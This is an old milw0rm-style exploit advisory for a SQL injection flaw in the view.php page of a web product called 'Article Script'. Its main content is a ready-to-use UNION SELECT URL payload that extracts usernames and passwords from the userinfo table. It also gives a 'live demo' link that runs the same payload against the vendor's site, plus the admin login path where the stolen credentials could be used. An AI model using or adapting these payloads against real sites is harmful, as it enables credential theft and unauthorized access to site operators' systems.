61 lines
No EOL
1.3 KiB
Text
61 lines
No EOL
1.3 KiB
Text
|___________________________________________________|
|
|
|
|
|
| Article Script (view.php v ) Remote SQL Injection Vulnerability
|
|
|
|
|
|___________________________________________________
|
|
|---------------------Hussin X----------------------|
|
|
|
|
|
| Author: Hussin X
|
|
|
|
|
| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC
|
|
|
|
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|
|
|
|
|
|
|
|
|
|___________________________________________________
|
|
| |
|
|
|
|
|
| script : http://www.availscript.com/article_script.php
|
|
|
|
|
| DorK : :)
|
|
|___________________________________________________|
|
|
|
|
|
|
|
|
Exploit:
|
|
________
|
|
|
|
|
|
|
|
www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
|
|
|
|
|
|
|
|
L!VE DEMO:
|
|
|
|
|
|
http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
|
|
|
|
|
|
|
|
Login :
|
|
|
|
www.[target].com/Script/admin/login.php
|
|
|
|
|
|
|
|
|
|
____________________________( Greetz )_________________________________
|
|
|
|
|
| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
|
|
|
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|
|
|
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|
|
|______________________________________________________________________
|
|
|
|
|
|
Im IRAQi
|
|
|
|
# milw0rm.com [2008-09-21] |